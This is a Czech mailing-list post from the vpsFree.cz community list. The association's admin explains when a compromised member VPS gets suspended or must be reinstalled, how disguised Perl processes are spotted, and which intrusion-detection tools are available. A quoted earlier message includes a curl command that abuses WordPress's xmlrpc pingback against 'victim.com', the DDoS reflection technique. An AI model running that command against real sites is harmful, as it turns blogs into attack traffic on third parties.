[vpsFree.cz: community-list] Zmeny inode numbers u souboru na FS
Pavel Snajdr
snajpa at snajpa.net
Sun Mar 16 14:24:03 CET 2014
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
On 03/16/2014 01:47 PM, Pavel Snajdr wrote:
> On 03/16/2014 03:54 AM, Ondrej Mikle wrote:
>> On 03/16/2014 02:34 AM, Pavel Snajdr wrote:
>
>>> Ale at nad tim premejslim z jakyho chci uhlu, proste nevidim,
>>> jak se tomu vyhnout, krome prevence/osvety... Coz ale proste
>>> nefunguje, protoze tu svobodu mit svuj server maji i ti, co je
>>> to proste nezajima a jenom potrebujou, aby jim ten jejich
>>> eshop jel. S takovyma nadelame neco jenom tezko, protoze ti na
>>> to jdou stylem "install&forget", coz u systemu vystavenych do
>>> internetu nejde, no.
>
>> Otazka je, jak moc prudit cleny kvuli tomuto. Standardni odpoved
>> na to byva neco jako bounty program, ale nevim zatim, jak by to
>> mohlo fungovat u zdruzeni typu vpsfree.
>
> No, tak nejak. Asi s tim moc nenadelame. Jediny, co s tim
> post-mortem muzem delat, je vynutit si reinstall takovy VPS od
> clena, jinak mu ji nepustime. Toto realne delam ve vetsine
> pripadu, tzn. opravdu si chcete vsichni drzet ty VPS zabezpeceny,
> nechcete, abych po vas dupal, ze si to musite reinstallovat :)
> Drtiva vetsina lidi totiz nema na to dohledat vsechny dopady hacku
> dany VPS po celym jejim FS, takze je reinstall jedinou rozumnou
> moznosti. Ale jsou lidi, co by do nej dobrovolne nesli a radsi
> posilali spamy z VPS, tak proto to vynucuju (yes, i takovi
> jsou..).
Jenom upresneni - kdyz ti nekdo hackne wordpress a posila odtamtud
spamy, preposilam abuse notices na mail uvedeny ve vpsAdminu. Kdyz se
to opakuje nekolikrat v prubehu tak tydne a situace se neresi (tzn.
clen se treba ani neozve) nasleduje suspend clena, ale kvuli tomu
reinstall po nikom nechci.
Reinstall chci v pripade, ze ve VPS vidim bezet procesy, co si process
name zmenily na napr. /usr/sbin/httpd nebo /usr/sbin/sshd, ale jejich
/proc/<pid>/exe ukazuje na Perl; pri takovych a podobnych pripadech je
to na reinstall, protoze to uz je realny vlamani dovnitr VPS. Vsimnu
si jich jednoduse - kterej sshd nebo httpd zere 100% CPU porad? :)
Tak jenom tak, aby v tom bylo jasno vsem :)
/snajpa
>
>
>>> Automatizovat vyhledavani zastaralejch verzi baliku napric
>>> kontejnerama stejne nezachrani deravy wordpressy nachazejici se
>>> na tech nejnestandardnejsich mistech, prohledavat FS kazdyho
>>> kontejneru takhle se neda. Nevim, moc se s tim asi delat neda
>>> no.
>
>> Wordpress je zlo: "Notorious botnet comes complete with blogging
>> software"
>
>> curl -D - "http://awritersnotepad.wordpress.com/xmlrpc.php" -d
>> '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>awritersnotepad.wordpress.com/postchosen</string></value></param></params></methodCall>'
>
>>
>>
Srandovni reply header: X-hacker: If you're reading this, you
>> should visit automattic.com/jobs and apply to join the fun,
>> mention this header.
>
>> Such source:
>> http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
>
>>
>>
> Nj
>
> jenze tohle zlo jedno z nejrozsirenejsich blogovadel/webovadel na
> svete, takze nas bude trapit jeste pekne dlouho :)
>
>
> Jinak jeste @ rkhunter: neznam moc alternativ no. Pak jsou akorat
> softy, ktery delaji neco trochu jinyho, v podstate ale taky IDS
> (intrusion detection).
>
> Kdysi se zvyknul pouzivat Tripwire, ale posledni release je 2011,
> takze jeste horsi, nez s rkhunterem.
>
> Ale behem hledani jsem narazil asi na jeden z mala aktivne
> vyvijenejch IDS pro linux aktualne:
>
> http://la-samhna.de/samhain/
>
> (ono je toho vic, ale vsechno je nevyvijeny, napr AIDE, OSSEC...)
>
> /snajpa
>
>
>> Ondro
>
>
>
>> _______________________________________________ Community-list
>> mailing list Community-list at lists.vpsfree.cz
>> http://lists.vpsfree.cz/listinfo/community-list
>
> _______________________________________________ Community-list
> mailing list Community-list at lists.vpsfree.cz
> http://lists.vpsfree.cz/listinfo/community-list
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iF4EAREIAAYFAlMlpfEACgkQMBKdi9lkZ6qIVAD/XPpK9QBXVzwFrt/KSKkHHFxj
MGFg6tEQ7ypgzWa+EkgA/2KHeJAoDQeWzgHqPD+pv4nmDgPfnMh13JXPPJB3XUIm
=8cR7
-----END PGP SIGNATURE-----
More information about the Community-list
mailing list